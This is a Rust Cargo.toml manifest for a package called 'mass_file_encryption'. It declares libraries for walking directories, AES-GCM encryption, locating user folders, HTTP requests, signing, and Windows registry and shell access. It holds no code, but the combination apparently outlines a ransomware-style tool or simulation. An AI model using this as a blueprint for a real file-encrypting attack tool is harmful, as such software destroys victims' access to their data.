[package]
name = "mass_file_encryption"
version = "0.1.0"
edition = "2024"

[dependencies]
rand = "0.9.1"
walkdir = "2.5.0"
aes-gcm = "0.10.3"
hex = "0.4.3"
base64 = "0.22.1"
dirs = "6.0.0"
reqwest = {version="0.12.20", features=["blocking"]}
ed25519-dalek = {version = "2.1.1", features = ["pkcs8"]}
pem = "3.0.5"
serde_json = "1.0.140"
serde = {version = "1.0.219", features = ["derive"]}
random_word = { version = "0.5.0", features = ["en"] }

[target.'cfg(windows)'.dependencies]
winreg = "0.55.0"
windows = {version="0.61.3",features=["Win32_UI_Shell"]}
